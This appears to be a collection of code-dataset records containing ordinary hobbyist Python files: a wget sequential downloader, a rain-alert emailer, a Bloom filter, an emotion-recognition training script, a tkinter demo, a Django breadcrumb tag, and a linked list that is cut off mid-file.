+{"seq_id":"178082448","text":"# Written by Joshua Cullen ~ 2015\n# Designed to work on debian-based linux distributions\nimport os\nimport time\n\n# GLOBBAL VARIABLES\n\n# ALL FUNCTIONS LISTED HERE\ndef clear():\n\tos.system(\"clear\") # Clears the screen\n\ndef newline(n):\n\tfor x in range(n):\n\t\tprint(\"\") # New line\n\ndef getUrl():\n\tclear() # Getting url\n\tprint(\"Please enter the full url and path to the first file below.\")\n\tprint(\"e.g. www.example.com/1.jpg :\")\n\tnewline(1)\n\turl = input(\">>> \")\n\treturn url\n\ndef getFileNumber():\n\tclear()\n\twhile True: # Getting number of files\n\t\tprint(\"Please enter the number of files to download.\")\n\t\tprint(\"e.g. www.example.com/1.jpg :\")\n\t\tnewline(1)\n\t\ttry:\n\t\t\tnumberOfFiles = int(input(\">>> \"))\n\t\t\tbreak\n\t\texcept ValueError:\n\t\t\tclear()\n\t\t\tprint(\"This needs to be an integer!\")\n\t\t\tnewline(1)\n\treturn numberOfFiles\n\ndef getFinalDirectory():\n\tclear()\n\tprint(\"Please enter the directory you want the files to be downloaded to.\")\n\tprint(\"e.g. '~/webImages/' :\")\n\tnewline(1)\n\tfinalDirectory = input(\">>> \")\n\treturn finalDirectory\n\ndef isWgetInstalled():\n\tclear()\n\twhile os.path.isfile(\"/usr/bin/wget\") != True:\n\t\tprint(\"You need to have wget installed to use this tool.\")\n\t\tprint(\"Would you like to install it? 'Y' or 'N':\")\n\t\tnewline(1)\n\t\tanswer = input(\">>> \").upper()\n\t\tif answer == \"Y\":\n\t\t\tnewline(1)\n\t\t\tos.system(\"sudo apt-get -qq -y install wget\") # Installing wget\n\t\t\tclear()\n\t\t\tprint(\"Wget finished installing!\")\n\t\t\ttime.sleep(2)\n\t\t\tclear()\n\t\t\treturn True\n\t\telif answer == \"N\":\n\t\t\tnewline(1)\n\t\t\tprint(\"Well this tool doesn't work without it.\")\n\t\t\tprint(\"Come back if you change your mind!\")\n\t\t\tnewline(1)\n\t\t\treturn False\n\telse:\n\t\treturn True\n\ndef splitUpUrl(url):\n\tprenumber = \"\"\n\tnumber = \"\"\n\tpostnumber = \"\"\n\tif \"//\" in url:\n\t\tusableUrl = url.replace(\"//\", \"\")\n\telse:\n\t\tusableUrl = url\n\tnumberOfFiles = getFileNumber()\n\tpath = usableUrl[usableUrl.index(\"/\"):]\n\taddress = url.replace(path, \"\")\n\textention = path[path.index(\".\"):]\n\tprint(path)\n\tfor char in reversed(path.replace(extention, \"\")):\n\t\ttry:\n\t\t\tif char == \"/\":\n\t\t\t\tbreak\n\t\t\tint(char)\n\t\t\tnumber += char\n\t\texcept ValueError:\n\t\t\tif number == \"\":\n\t\t\t\tpostnumber += char\n\t\t\telse:\n\t\t\t\tprenumber += char\n\tpostnumber = postnumber[::-1]\n\tnumber = number[::-1]\n\tprenumber = prenumber[::-1]\n\tprint(prenumber+number+postnumber)\n\tstoppingpoint = prenumber+number+postnumber+extention\n\tpath = path[:path.index(stoppingpoint)]\n\treturn address, path, prenumber, number, postnumber, extention, numberOfFiles\n\ndef welcome():\n\tclear()\n\tprint(\"Welcome to the sequential file downloader!\")\n\ttime.sleep(2)\n\n# MAIN PROGRAM HERE\nwelcome()\nif isWgetInstalled() != True:\n\tquit()\nurl = getUrl()\naddress, path, prenumber, number, postnumber, extention, numberOfFiles = splitUpUrl(url)\nfinalDirectory = getFinalDirectory()\ncount = 0\nfor n in range(int(number),(int(number)+numberOfFiles)):\n\tclear()\n\tcount += 1\n\tnewline(1)\n\tprint(\"Downloading file %d of %d\" %(count, numberOfFiles))\n\tnewline(1)\n\tos.system(\"wget \"+address+path+prenumber+str(n)+postnumber+extention+\" -P \"+finalDirectory)\nclear()\nprint(\"All finished!\")\nnewline(1)\ninput(\"Press enter to exit...\")\n\nclear()\n","sub_path":"run_me.py","file_name":"run_me.py","file_ext":"py","file_size_in_byte":3101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"308605733","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import print_function\n\nimport os\nimport time\nimport json\nimport inspect\nimport logging\nimport smtplib\nimport requests\nimport datetime\n\n\nfrom email.mime.text import MIMEText\nfrom email.mime.image import MIMEImage\nfrom email.mime.multipart import MIMEMultipart\n\n\nclass GetUmbrella(object):\n\n def __init__(self):\n filename = inspect.getframeinfo(inspect.currentframe()).filename\n script_path = os.path.dirname(os.path.abspath(filename))\n self.script_path = script_path\n self.config = self.load_config()\n self.blnSend = 0\n self.send_mail(self.parse_conditions(self.get_cities_forecast()))\n\n def load_config(self):\n \"\"\"\n Load configuration from the config.json file.\n\n Returns:\n json object with configuration.\n \"\"\"\n config_file = \"config.json\"\n script_root = self.script_path\n with open(os.path.join(script_root, config_file), \"r\") as ConfigFile:\n return json.load(ConfigFile)\n\n def get_cities_forecast(self):\n \"\"\"\n Retrieve the forecast for several cities\n\n Returns:\n cities_conditions: List with the city list conditions\n \"\"\"\n cities_conditions = []\n for city in self.config[\"openweathermap\"][\"cities\"]:\n cities_conditions.append([city, self.get_forecast(city)])\n return cities_conditions\n\n def parse_conditions(self, lst_conditions):\n \"\"\"\n This will parse the weather conditions and convert it into html to me sent.\n\n Args:\n lst_conditions: List with weather conditions\n\n Returns:\n msg: String with formatted HTML text.\n \"\"\"\n msg = \"Weather conditions for tomorrow. \"\n for iteraction, cities in enumerate(lst_conditions):\n city = lst_conditions[iteraction][0]\n city_conditions = lst_conditions[iteraction][1]\n if len(city_conditions) > 1:\n msg += \" In {} : \".format(city)\n for condition in city_conditions:\n condition_date = condition[0]\n min_tem = condition[1]\n max_temp = condition[2]\n strcondition = condition[3]\n icon = condition[4]\n msg += \"\"\" At {} there will be {} \n with the following temperatures: \n Minimum temperature: {} \n Maximum temperature: {} \n \"\"\".format(condition_date, strcondition, min_tem, max_temp, icon)\n\n return msg\n\n def get_forecast(self, strcity):\n \"\"\"\n This function will get 5 days forecast weather in Barcelona\n to sent through the Bot\n\n Args:\n strcity: String with the city name you want to retrieve the forecast from.\n\n Returns:\n conditions: list with the conditions retrieved\n \"\"\"\n conditions = []\n r = requests.get(\"http://api.openweathermap.org/data/2.5/forecast?q={}&appid={}\".format(strcity, self.config[\"openweathermap\"][\"API_KEY\"])).json()\n umbrella_conditions = (\"heavy rain\", \"light rain\", \"rain\", \"moderate rain\", \"shower rain\", \"thunderstorm\")\n\n for i in range(len(r[\"list\"])):\n min_temp = int(r[\"list\"][i][\"main\"][\"temp_min\"] - 273.15)\n max_temp = int(r[\"list\"][i][\"main\"][\"temp_max\"] - 273.15)\n Date = str(r[\"list\"][i][\"dt_txt\"])\n condition = str(r[\"list\"][i][\"weather\"][0][\"description\"])\n icon = str(r[\"list\"][i][\"weather\"][0][\"icon\"])\n tomorrow = str(datetime.date.today() + datetime.timedelta(days=1))\n\n if Date.split(\" \")[0] == tomorrow:\n if condition in umbrella_conditions:\n self.blnSend = 1\n conditions.append([Date, min_temp, max_temp, condition, icon])\n return conditions\n\n def log(self, strlog):\n \"\"\"\n This function will log every command and msg received by the bot or any\n other info the user wants to log on the file.\n\n Args:\n strlog: String with the message or data to want to write on the file.\n\n Returns:\n Nothing.\n \"\"\"\n if self.config['log']:\n FORMAT = '%(levelname)s,%(name)s,%(message)s'\n logging.basicConfig(format=FORMAT, filename=os.path.join(self.script_path, 'LogFile.log'), level=logging.INFO)\n time_now = time.strftime(\"%Y-%m-%d,%H:%M:%S\", time.gmtime())\n logging.info(time_now + \",\" + strlog)\n\n def send_mail(self, strmsg):\n \"\"\"\n Send the mail warning about weather condition\n\n Args:\n strmsg: String with the message to be sent.\n\n Returns:\n Nothing.\n \"\"\"\n if self.blnSend:\n # Email of sender data.\n from_email = self.config[\"emails\"][\"from\"]\n email_passwd = self.config[\"emails\"][\"password\"]\n to_emails = self.config[\"emails\"][\"to\"]\n\n for to_email in to_emails:\n # Compose the email to be sent\n message = MIMEMultipart()\n message['Subject'] = 'Rain Alert!!!'\n message['From'] = from_email\n message['To'] = to_email\n\n # Read image to sent\n for icon in self.config['icons']:\n imageToMail = os.path.normpath(os.path.join(self.script_path, \"icons\", icon+\".png\"))\n with open(imageToMail, 'rb') as fp:\n img = MIMEImage(fp.read())\n img.add_header('Content-ID', '<{}>'.format(icon))\n fp.close()\n message.attach(img)\n # Add text to message\n msgText = MIMEText('{}
'.format(strmsg), 'html')\n message.attach(msgText)\n\n # The actual mail send\n server = smtplib.SMTP(\"smtp.gmail.com:587\")\n server.starttls()\n server.login(from_email, email_passwd)\n server.sendmail(from_email, to_email, str(message))\n\n server.quit()\n self.log(\"Email sent to {} .\".format(to_email))\n else:\n self.log(\"No email sent since there were no conditions to get the umbrella.\")\n\n\n\"\"\"\nExecute the code\n\"\"\"\nUmbrella = GetUmbrella()\n","sub_path":"GetTheUmbrella.py","file_name":"GetTheUmbrella.py","file_ext":"py","file_size_in_byte":6520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"165010373","text":"import uuid\n\nclass StandardBloomFilter:\n \"\"\"\n @param: k: An integer\n \"\"\"\n def __init__(self, k):\n self.size = 500000\n self.bit_array = [0]*self.size\n\n self.hash_funcs = []\n for _ in range(k):\n salt = str(uuid.uuid4())\n self.hash_funcs.append(lambda x: hash(salt+x))\n\n \"\"\"\n @param: word: A string\n @return: nothing\n \"\"\"\n def add(self, word):\n for hash_func in self.hash_funcs:\n index = hash_func(word)%self.size\n self.bit_array[index] = 1\n \n \"\"\"\n @param: word: A string\n @return: True if contains word\n \"\"\"\n def contains(self, word):\n for hash_func in self.hash_funcs:\n index = hash_func(word)%self.size\n if self.bit_array[index] == 0:\n return False\n return True\n\n","sub_path":"src/0556/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"564721765","text":"import time\nimport copy\nimport os\nimport numpy as np\nimport torch.utils.data as data\nimport torchvision\nimport torchvision.transforms as transforms\nimport torch\nimport torch.nn as nn\nfrom sklearn import preprocessing\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nfrom torch.utils.tensorboard import SummaryWriter\n\nimport model.vgg_vd_face_fer_dag as vgg_model\nimport model.alexnet_face_fer_bn_dag as alex_model\n\n\n###global_variables\nbatch_size = 4\nnum_epochs = 10\nclasses={\n \"happy\":1,\n \"disgust\":2,\n \"fear\":3,\n \"surprise\":4,\n \"anger\":5,\n \"sadness\":6\n}\nlb = preprocessing.LabelBinarizer()\nlb = lb.fit_transform([1,2,3,4,5,6])\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n\nval_df = os.listdir(\"Torch_dataset/Val\")\ntrain_df = os.listdir(\"Torch_dataset/Train\")\n#test_df = os.listdir(\"orch_dataset/Test\")\nprint ('The no of validation and training videos respectively: ')\nprint (len(val_df), len(train_df))\n#len(test_df))\n\nclass KVIEDataset(data.Dataset): \n def __init__(self,fused_image_list=None,phase=None):\n self.phase = phase\n self.fused_image_info = fused_image_list\n self.rgb_mean = torch.tensor([0.70, 0.44, 0.36])\n self.rgb_std = torch.tensor([0.34, 0.37, 0.26])\n self.thermal_mean = torch.tensor([0.34, 0.37, 0.48])\n self.thermal_std = torch.tensor([0.18, 0.17, 0.24])\n self.rgb_mean = torch.unsqueeze(torch.unsqueeze(torch.unsqueeze(self.rgb_mean,0),2),3)\n self.rgb_std = torch.unsqueeze(torch.unsqueeze(torch.unsqueeze(self.rgb_std,0),2),3)\n self.thermal_mean = torch.unsqueeze(torch.unsqueeze(torch.unsqueeze(self.thermal_mean,0),2),3)\n self.thermal_std = torch.unsqueeze(torch.unsqueeze(torch.unsqueeze(self.thermal_std,0),2),3)\n if phase == 'train':\n print (\"No of training videos: \"+str(len(self.fused_image_info)))\n elif phase == 'val':\n print (\"No of validation videos: \"+str(len(self.fused_image_info)))\n else:\n print (\"No of testing videos: \"+str(len(self.fused_image_info)))\n \n def __len__(self):\n return len(self.fused_image_info)\n \n def __getitem__(self, index):\n if self.phase == 'train':\n fused_info = torch.load(\"Torch_dataset/Train/\"+self.fused_image_info[index])\n elif self.phase == 'val':\n fused_info = torch.load(\"Torch_dataset/Val/\"+self.fused_image_info[index])\n else:\n fused_info = torch.load(\"Torch_dataset/Test/\"+self.fused_image_info[index])\n rgb_images = fused_info['rgb']\n thermal_images = fused_info['thm']\n rgb_images = rgb_images.to(dtype=torch.float32)\n #print (rgb_images.shape)\n thermal_images = thermal_images.to(dtype=torch.float)\n rgb_images = rgb_images/255.0\n thermal_images = thermal_images/255.0\n rgb_images = (rgb_images - self.rgb_mean)/(self.rgb_std)\n thermal_images = (thermal_images - self.thermal_mean)/(self.thermal_std)\n label = fused_info['lbl']\n return rgb_images, thermal_images, label\n\ntrain_dataset = KVIEDataset(fused_image_list = train_df, phase=\"train\")\nval_dataset = KVIEDataset(fused_image_list = val_df, phase=\"val\")\n\ntrain_loader = torch.utils.data.DataLoader(dataset=train_dataset, batch_size=batch_size, shuffle=True, num_workers=4)\nval_loader = torch.utils.data.DataLoader(dataset=val_dataset, batch_size=batch_size, shuffle=True, num_workers=4)\n\ndataloaders = {}\ndataloaders['train'] = train_loader\ndataloaders['val'] = val_loader\ndataset_sizes = {}\ndataset_sizes['train'] = len(train_loader.dataset)\ndataset_sizes['val'] = len(val_loader.dataset)\n\n\n## Loading thermal and visible models\ndef vgg_vd_face_fer_dag(weights_path=None, **kwargs):\n \"\"\"\n load imported model instance\n\n Args:\n weights_path (str): If set, loads model weights from the given path\n \"\"\"\n model = vgg_model.Vgg_vd_face_fer_dag()\n if weights_path:\n state_dict = torch.load(weights_path)\n model.load_state_dict(state_dict)\n return model\n \ndef alexnet_face_fer_bn_dag(weights_path=None, **kwargs):\n \"\"\"\n load imported model instance\n\n Args:\n weights_path (str): If set, loads model weights from the given path\n \"\"\"\n model = alex_model.Alexnet_face_fer_bn_dag()\n if weights_path:\n state_dict = torch.load(weights_path)\n model.load_state_dict(state_dict)\n return model\n\nclass Conv_LSTM(nn.Module):\n\n def __init__(self, num_classes, input_size, hidden_size, num_layers, bidirectional):\n super(Conv_LSTM, self).__init__()\n \n self.num_classes = num_classes\n self.num_layers = num_layers\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.bidirectional = bidirectional\n #self.seq_length = seq_length\n self.dropout = nn.Dropout(p=0.2)\n \n self.lstm = nn.LSTM(input_size=input_size, hidden_size=hidden_size, num_layers=num_layers, batch_first=True, bidirectional = self.bidirectional)\n \n #self.fc = nn.Linear(hidden_size, num_classes)\n\n def forward(self, x):\n if self.bidirectional == False:\n h_0 = torch.zeros(self.num_layers, x.size(0), self.hidden_size).to(device)\n c_0 = torch.zeros(self.num_layers, x.size(0), self.hidden_size).to(device)\n else:\n h_0 = torch.zeros(self.num_layers*2, x.size(0), self.hidden_size).to(device)\n c_0 = torch.zeros(self.num_layers*2, x.size(0), self.hidden_size).to(device)\n \n # Propagate input through LSTM\n out, (h_out, _) = self.lstm(x, (h_0, c_0))\n \n #h_out = h_out.view(-1, self.hidden_size)\n \n #out = self.fc(h_out)\n #out = self.dropout(out)\n #print (out.shape)\n if self.hidden_size == 6:\n return self.dropout(h_out)\n else:\n return self.dropout(out)\n\ndef lstm(num_classes,input_size,hidden_size,num_layers,bidirectional):\n model = Conv_LSTM(num_classes,input_size,hidden_size,num_layers,bidirectional)\n return model\n\n\ndef init_weights(m):\n if type(m) == nn.LSTM:\n nn.init.orthogonal_(m.weight_ih_l0, gain=10*nn.init.calculate_gain('tanh'))\n nn.init.orthogonal_(m.weight_hh_l0, gain=10*nn.init.calculate_gain('tanh'))\n if type(m) == nn.Linear:\n nn.init.xavier_normal_(m.weight, gain=nn.init.calculate_gain('relu'))\n nn.init.constant_(m.bias, 0.0)\n \nclass desc(nn.Module):\n\tdef __init__(self):\n\t\tcounter_rgb,counter_thermal = 0,0\n\t\tsuper(desc, self).__init__()\n\t\tself.rgb_model = alexnet_face_fer_bn_dag(weights_path=\"pretrained_model/alexnet_face_fer_bn_dag.pth\")\n\t\tself.thermal_model = vgg_vd_face_fer_dag(weights_path=\"pretrained_model/vgg_vd_face_fer_dag.pth\")\n\t\tfor params in self.rgb_model.parameters():\n\t\t\tcounter_rgb +=1\n\t\t\t#print (params.shape)\n\t\t\tif counter_rgb <= 26:\n\t\t\t\t#print (params)\n\t\t\t\tparams.requires_grad = False\n\t\tfor params in self.thermal_model.parameters():\n\t\t\t#print (params.shape)\n\t\t\tcounter_thermal +=1\n\t\t\tif counter_thermal <= 2:\n\t\t\t\t#print (params)\n\t\t\t\tparams.requires_grad = False\n\t\tprint (counter_rgb, counter_thermal)\n\t\tself.fc1 = nn.Sequential(nn.Linear(24, 6, bias=True),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t#nn.ReLU(inplace=True),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t#nn.Dropout(0.5,inplace=False),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t#nn.Linear(64,6, bias=True),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tnn.Sigmoid())\n\t\t'''self.fc2 = nn.Sequential(nn.Linear(8192, 512, bias=True),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tnn.ReLU(inplace=True),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tnn.Linear(512,6, bias=True),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tnn.Sigmoid())'''\n\t\tprint (self.rgb_model)\n\t\tprint (self.thermal_model)\n\t\tself.rnn_model_rgb_ini = lstm(num_classes = 6, input_size = 4096, hidden_size = 512, num_layers=1, bidirectional = True)\n\t\tself.rnn_model_rgb_final = lstm(num_classes = 6, input_size = 1024, hidden_size = 6, num_layers=1, bidirectional = True)\n\t\tself.rnn_model_thermal_ini = lstm(num_classes = 6, input_size = 4096, hidden_size = 512 , num_layers=1, bidirectional = True)\n\t\tself.rnn_model_thermal_final = lstm(num_classes = 6, input_size = 1024, hidden_size = 6, num_layers=1, bidirectional = True)\n\t\tprint (self.rnn_model_rgb_ini)\n\t\t#self.rnn_model_rgb.apply(init_weights)\n\t\t#self.rnn_model_thermal.apply(init_weights)\n\t\t#self.fc2.apply(init_weights)\n\t\tself.fc1.apply(init_weights)\n\n\tdef forward(self, thermal_img, rgb_img):\n\t\tthermal_features = self.thermal_model(thermal_img)\n\t\trgb_features = self.rgb_model(rgb_img)\n\t\trgb_lstm_input = rgb_features.view(4,15,4096)\n\t\tthermal_lstm_input = thermal_features.view(4,15,4096)\n\t\trnn_out_rgb_1 = self.rnn_model_rgb_ini(rgb_lstm_input)\n\t\trnn_out_rgb_2 = self.rnn_model_rgb_final(rnn_out_rgb_1)\n\t\trnn_out_thm_1 = self.rnn_model_thermal_ini(thermal_lstm_input)\n\t\trnn_out_thm_2 = self.rnn_model_thermal_final(rnn_out_thm_1)\n\t\t#print (rnn_out_1.shape, rnn_out_2.shape)\n\t\tcombined_features = torch.cat((rnn_out_rgb_2,rnn_out_thm_2), dim =2)\n\t\t#print (combined_features.shape)\n\t\t#print (combined_features[1,0],combined_features[1,1])\n\t\t#lstm_input = combined_features.view(4,15,8192)\n\t\t#print (lstm_input[0,1,0],lstm_input[0,1,1])\n\t\t#rnn_out_1 = self.rnn_model_ini(lstm_input)\n\t\t#rnn_out_2 = self.rnn_model_final(rnn_out_1)\n\t\t#print (rnn_out_2.shape)\n\t\timg = torch.transpose(combined_features, 0, 1)\n\t\timg = torch.flatten(img, start_dim=1)\n\t\t#print (img.shape)\n\t\timg = self.fc1(img)\n\t\treturn img\n\t\t\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nprint(device)\n\ntorch.cuda.empty_cache()\nmodel_ft = desc()\n\nmodel_ft = model_ft.to(device)\n\n\ncriterion = nn.CrossEntropyLoss()\n\n# Observe that all parameters are being optimized\noptimizer_ft = optim.Adam(filter(lambda p: p.requires_grad, model_ft.parameters()), lr=0.000001)\n\n# Decay LR by a factor of 0.1 every 7 epochs\nexp_lr_scheduler = lr_scheduler.StepLR(optimizer_ft, step_size=15, gamma=0.5)\n\n\ndef train_model(model, criterion, optimizer, scheduler, batch_size, num_epochs, writer, sequence_length):\n since = time.time()\n\n best_model_wts = copy.deepcopy(model.state_dict())\n best_acc = 0.0\n\n for epoch in range(num_epochs):\n print('Epoch {}/{}'.format(epoch, num_epochs - 1))\n print('-' * 10)\n\n # Each epoch has a training and validation phase\n for phase in ['train', 'val']:\n if phase == 'train':\n model.train() # Set model to training mode\n else:\n model.eval() # Set model to evaluate mode\n\n running_loss = 0.0\n running_corrects = 0\n\n # Iterate over data.\n #since = time.time()\n batch_counter = 0\n for thermal_inputs,rgb_inputs,labels in dataloaders[phase]:\n batch_counter +=1\n thermal_inputs = thermal_inputs.to(device)\n rgb_inputs = rgb_inputs.to(device)\n if (list(thermal_inputs.shape) == [batch_size,sequence_length,3,224,224]) and (list(rgb_inputs.shape) == [batch_size,sequence_length,3,224,224]):\n thermal_inputs = torch.reshape(thermal_inputs,(batch_size*sequence_length,3,224,224))\n rgb_inputs = torch.reshape(rgb_inputs,(batch_size*sequence_length,3,224,224))\n labels = labels.to(device)\n optimizer.zero_grad()\n\n # forward\n # track history if only in train\n with torch.set_grad_enabled(phase == 'train'):\n outputs = model(thermal_inputs, rgb_inputs)\n #print (outputs)\n _, y_pred_tags = torch.max(outputs, dim = 1)\n loss = criterion(outputs, torch.max(labels, 1)[1])\n # backward + optimize only if in training phase\n if phase == 'train':\n loss.backward()\n optimizer.step()\n \n \n \n # statistics\n running_loss += loss.item()\n running_corrects += torch.sum(y_pred_tags == torch.max(labels, 1)[1])\n #print (running_corrects)\n #break;\n #break;\n if phase == 'train':\n scheduler.step()\n \n\n epoch_loss = running_loss\n epoch_acc = running_corrects / dataset_sizes[phase]\n writer.add_scalar('Loss/'+phase, epoch_loss, epoch)\n # print(loss.item())\n print('{} Loss: {:.4f} Acc: {:.4f}'.format(\n phase, epoch_loss, epoch_acc))\n\n # deep copy the model\n if phase == 'val' and epoch_acc > best_acc:\n best_acc = epoch_acc\n best_model_wts = copy.deepcopy(model.state_dict())\n\n print()\n #break;\n #break;\n\n time_elapsed = time.time() - since\n print('Training complete in {:.0f}m {:.0f}s'.format(\n time_elapsed // 60, time_elapsed % 60))\n print('Best val Acc: {:4f}'.format(best_acc))\n\n # load best model weights\n model.load_state_dict(best_model_wts)\n return model\n \nwriter = SummaryWriter(log_dir = \"Stats/Fusion3\")\nmodel = train_model(model_ft, criterion, optimizer_ft, exp_lr_scheduler, batch_size, num_epochs, writer, 15)\n###optional\n'''torch.save({'epoch': 10,\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer_ft.state_dict(),\n }, \"data/models/fusion_approach2.pth\")'''","sub_path":"fusion_approach3.py","file_name":"fusion_approach3.py","file_ext":"py","file_size_in_byte":13418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"118534014","text":"import tkinter as tk\nimport time\nimport pygame\nfrom pygame.locals import *\nfrom threading import Thread\nimport win32api,win32con\nfrom tkinter import messagebox #引入弹窗库\n\nscreen_x = win32api.GetSystemMetrics(win32con.SM_CXSCREEN) #获得屏幕分辨率X轴\nscreen_y = win32api.GetSystemMetrics(win32con.SM_CYSCREEN) #获得屏幕分辨率Y轴\n\n\ndef on_closing():\n global moni_window\n if moni_window:\n moni_window.destroy()\n moni_window = None\n\nmoni_window = tk.Tk() #只有一个Tk窗口\n# moni_window = tk.Toplevel() #已有Tk窗口使用Toplevel\nmoni_window.title('弹窗位置设定工具')\n# moni_window.geometry(\"324x300\")\nmoni_window.geometry(str(screen_x)+\"x\"+str(screen_y))\nmoni_window.protocol('WM_DELETE_WINDOW',on_closing)\nmoni_window.attributes(\"-alpha\", 0.6)\n#设置窗口大小不可改变\nmoni_window.resizable(False, False)\n\ndef callback():\n tk_label_y = 30\n # 注意设置坐标的时候是换算后的\n # rate = get_rate() # 获取缩放比例\n # x = int(moni_window.winfo_x()/rate)\n # y = int((moni_window.winfo_y()+tk_label_y)/rate)\n # set_win_location(x,y)\n global moni_window\n if moni_window:\n moni_window.destroy()\n moni_window = None\n\n\n# x,y = get_win_location()\n\n# if x is not None and y is not None:\n# rate = get_rate() # 获取缩放比例\n# x = int(x*rate)\n# y = int(y*rate)\n# moni_window.geometry(\"+\"+str(x)+\"+\"+str(y))\n\n# moni_background = tk.PhotoImage(file=\"moni_bg.png\")\nframe = tk.Frame(moni_window, bg=\"yellow\",cursor=\"crosshair\")\nframe.pack()\n# tip_text = \"如果你想设定pygame弹窗位置\\n可以拖动这个窗口,并点击确认\\n如果无需调整,可点击取消\"\n# text=tip_text,\nmoni_background = tk.PhotoImage(file=r\"res\\moni_bg_test.png\")\nok_png = tk.PhotoImage(file=r\"res\\ok.png\")\ncancel_png = tk.PhotoImage(file=r\"res\\cancel.png\")\nflower_jpg = tk.PhotoImage(file=r\"res\\flower.jpg\")\npos_png = tk.PhotoImage(file=r\"res\\pos.gif\")\ncursor_png = tk.PhotoImage(file=r\"res\\cursor.png\")\n\ntip_label = tk.Label(frame,image=flower_jpg,compound = tk.CENTER,font=(\"Microsoft YaHei\",13),fg='black', justify=\"left\", width=screen_x, height=screen_y, wraplength=300)\ntip_label.pack()\n\n\n\n# ok_png = tk.PhotoImage(file=\"ok.png\")\n# ok_btn = tk.Button(frame, image=ok_png, bg=\"#fdfdbc\", activebackground=\"#fdfdbc\", bd=0, cursor=\"hand2\", compound = tk.CENTER,command=callback, width=86, height=42)\n# ok_btn.place(relx=0.2, rely=0.7) #注意为了保持按钮的对称,ok_btn和cancel_btn的relx之和必须为0.735, ok_btn的relx小于0.23\n\n\n# cancel_btn = tk.Button(frame, image=cancel_png, bg=\"#fdfdbc\",activebackground=\"#fdfdbc\", bd=0, cursor=\"hand2\",compound = tk.CENTER,command=on_closing, width=86, height=42)\n# cancel_btn.place(relx=0.535, rely=0.7)\n\nx = 0\ny = 0\ndef locate(event):\n print(event.x)\n print(event.y)\n global frame\n show_click_pos(frame, event.x, event.y)\n res = messagebox.askokcancel(title='定位确认',message='您是否确认定位在这里?')\n if res == True:\n #Todo: 这里应该有一个在刚才点击位置\n pass\n global moni_window\n if moni_window:\n moni_window.destroy()\n moni_window = None\n print(res) # return ok)\n# print(event.x,event.y)\n# global moni_window\n# global x\n# global y\n# x,y = event.x, event.y\n# moni_window.geometry(\"324x300\"+\"+\"+str(x)+\"+\"+str(y))\n # if event.type==pygame.MOUSEMOTION:\n # x, y = event.pos 直接获取鼠标的坐标\n# pygame.mouse.set_visible(False)\n\n \n\nmoni_window.bind(\"\",locate)\n# moni_window.attributes(\"-fullscreen\", True)\n\ndef show_click_pos(frame, x, y):\n# pos_label = tk.Label(frame,image=pos_png,compound = tk.CENTER,font=(\"Microsoft YaHei\",13),fg='black',justify=\"left\", wraplength=300)\n# pos_label.pack()\n # import matplotlib\n # from matplotlib import pyplot as plt\n # from PIL import Image\n # img = Image.open(\"pos.jpg\")\n # fig = plt.figure()\n \n # fig.canvas.manager.window.wm_geometry(\"+\"+str(x)+\"+\"+str(y))\n # fig.imshow(img)\n # fig.figimage(img)\n # plt.show()\n # fig.show()\n\n print(\"show_click_pos finish\")\n\ndef get_full_pos():\n import pyautogui\n try:\n while True:\n x, y = pyautogui.position()\n x -= 100\n y -= 100\n # global moni_window\n # moni_window.geometry(\"324x300\"+\"+\"+str(x)+\"+\"+str(y))\n # print(x,y)\n time.sleep(0.1)\n except KeyboardInterrupt:\n print('\\nExit.')\n\nThread(target=get_full_pos, daemon=True).start()\nmoni_window.mainloop()\n","sub_path":"window_demo.py","file_name":"window_demo.py","file_ext":"py","file_size_in_byte":4660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"179906392","text":"from django import template\n\nregister = template.Library()\n\n@register.assignment_tag\ndef get_breadcrumb(url):\n\tval = [(\"/\", \"Inicio\")]\n\tu = url.split(\"/\")\n\tu.remove(\"\")\n\tu.remove(\"\")\n\tfor i, v in enumerate(u, start=1):\n\t\tval.append((\"/%s/\" % \"/\".join(u[:i]), v.replace(\"-\", \" \").title()))\n\treturn val\n","sub_path":"utils/templatetags/breadcrumb.py","file_name":"breadcrumb.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"619036885","text":"#!/usr/bin/env python\nimport gc\n\nclass Node(object):\n\n def __init__(self, data = None, next = None):\n self.data = data\n self.next = next\n\n def __str__(self):\n return str(self.data)\n\n def __del__(self):\n pass\n\n def getData(self):\n return self.data\n\n def setData(self, data):\n self.data = data\n\n def getNext(self):\n return self.next\n\n def setNext(self, next):\n self.next = next\n\n\n\nclass LinkedList(object):\n\n def __init__(self):\n self.head = None\n\n def __del__(self):\n self.EmptyList()\n\n def isEmpty(self):\n return self.head == None\n\n # Insert a node at head of list\n def InsertAtHead(self, data):\n new_node = Node(data)\n new_node.setNext(self.head)\n self.head = new_node\n\n def InsertAtTail(self, data):\n current = self.head\n\n new_node = Node(data)\n # If list empty set new node as head\n if (not self.head):\n self.head = new_node\n # Find the tail\n else:\n while current.getNext():\n current = current.getNext()\n current.setNext(new_node )\n\n def DeleteNode(self, data):\n current = self.head\n\n while current.next.data != data:\n current = current.getNext()\n current.next = current.next.next\n\n\n\n def EmptyList(self):\n print(\"Starting empty list\")\n if (self.head):\n current = self.head\n while (current):\n self.head = current.getNext()\n del current\n current = self.head\n return 'List now empty'\n\n # Compute the number of nodes in the list\n def size(self):\n current = self.head\n count = 